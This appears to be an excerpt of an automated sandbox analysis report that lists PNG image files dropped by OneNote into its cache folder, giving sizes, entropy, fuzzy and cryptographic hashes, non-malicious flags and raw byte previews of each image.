                                                                                                                                                    Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000035.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11886
                                                                                                                                                    Entropy (8bit):7.946442244439929
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                    MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                    SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                    SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                    SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000036.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):16003
                                                                                                                                                    Entropy (8bit):7.959532793770661
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                    MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                    SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                    SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                    SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000037.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4190
                                                                                                                                                    Entropy (8bit):7.94161730428269
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                    MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                    SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                    SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                    SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000038.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11332
                                                                                                                                                    Entropy (8bit):7.9324721568775285
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                    MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                    SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                    SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                    SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000039.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4490
                                                                                                                                                    Entropy (8bit):7.928016176674318
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                    MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                    SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                    SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                    SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003A.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13241
                                                                                                                                                    Entropy (8bit):7.931391290415517
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                    MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                    SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                    SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                    SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003B.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4181
                                                                                                                                                    Entropy (8bit):7.943341403425058
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                    MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                    SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                    SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                    SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003C.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):14553
                                                                                                                                                    Entropy (8bit):7.951135681293377
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                    MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                    SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                    SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                    SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003D.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4181
                                                                                                                                                    Entropy (8bit):7.950380155401321
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                    MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                    SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                    SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                    SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003E.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2270
                                                                                                                                                    Entropy (8bit):7.845368393313232
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                    MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                    SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                    SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                    SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003F.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):8184
                                                                                                                                                    Entropy (8bit):7.807848176906598
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                    MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                    SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                    SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                    SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003G.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2599
                                                                                                                                                    Entropy (8bit):7.903700862190034
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                    MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                    SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                    SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                    SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                    Malicious:false
